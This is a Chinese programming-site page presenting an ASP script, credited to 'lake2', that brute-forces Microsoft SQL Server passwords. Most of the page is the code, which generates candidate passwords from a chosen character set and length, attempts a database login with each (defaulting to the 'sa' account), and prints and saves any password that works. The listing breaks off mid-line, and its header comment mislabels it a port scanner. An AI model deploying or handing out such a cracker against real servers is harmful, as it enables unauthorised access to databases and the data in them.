您现在的位置:计算机技术学习网 > 技术中心 > WEB编程 > ASP >

一个暴力破解MSSQL用户密码的ASP程序

来源:网络 责任编辑:栏目编辑 发表时间:2013-07-01 11:59 点击:

作者: Knight

一个暴力破解MSSQL用户密码的ASP程序,以下这个版本是可以运行之后关闭浏览器,运行完毕将在当前目录生成结果文件的。


CODE:
[Copy to clipboard]
<%
============ ASP Port Scanner by lake2 ===================
http://lake2.0x54.org
Version: 0.1
For SpringBoard
==========================================================
%>
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
</style>
<title>MSSQL Cracker for SpringBoard</title>
<%
Dim Password()
If Request.Form("go") <> "1" Then
%>
    <div align="center">Welcome to <a href="http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a> </div>
    <form name="form1" method="post" action="" onSubmit="form1.Submit.disabled=true;">
     ConnStr:
     <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70">
     <br>
     Char:    
     <input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30">
   <br>
Length: 
<input name="len" type="text" class="TextBox" id="len" value="3" size="4">
<br>
Path:    
<input name="path" type="text" class="TextBox" value="<%=Server.MapPath("r.txt")%>" size="50">
<input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked>
Enablel<br>
<input name="go" type="hidden" id="go" value="1">
<br>
<input name="Submit" type="submit" class="buttom" id="Submit" value=" Run ">
</form>
<%
Else
    timer1 = timer
    Server.ScriptTimeout = 7776000
    ConnStr = Request.Form("Conn")
    Char = request.Form("char")
    LenChar = Len(Char)
    ReDim password(LenChar)
    For i = 1 to LenChar
    password(i) = Mid(Char, i, 1)
    Next
    length = CInt(request.Form("len"))
    Call LAKE("")
    response.Write "Done!<br>Process " & tTime & " s"
    If request.Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime)
End If

Sub LAKE(str)
    If Len(str) >= length Then Exit Sub
    For j = 1 to LenChar
    pass = str & password(j)
    If Len(pass) = length Then Call Crack(pass)
    Call LAKE(pass)
    Next
End Sub


Sub Crack(str)
    On Error Resume Next
    Set conn = Server.CreateObject("ADODB.connection")
    conn.open Replace(ConnStr,"{PASS}",str)
    If Err Then
    If Err.Number <> -2147217843 Then
    response.Write(Err.Description & "<BR>")
    response.End()
    End If
    Else
    response.Write("I Get it ! Password is <font color=red>" & str & "</font><BR>Process " & tTime & " s")
    If request.Form("CFile") <> "" Then CreateResult(str & vbcr

    相关新闻>>

      发表评论
      请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
      用户名: 验证码:点击我更换图片
      最新评论 更多>>

      推荐热点

      • WAP常见问题问答大全(四)
      • ASP开发必备:WEB打印代码大全
      • ASP调用系统ping命令
      • asp缓存技术
      • ASP教程:第三篇 ASP基础
      • 用ASP+XML打造留言本(4)
      • 关于ASP Recordset 分页出现负数解决方法及建议
      • 用asp怎样编写文档搜索页面(5)
      • ASP处理多关键词查询实例代码
      网站首页 - 友情链接 - 网站地图 - TAG标签 - RSS订阅 - 内容搜索
      Copyright © 2008-2015 计算机技术学习交流网. 版权所有

      豫ICP备11007008号-1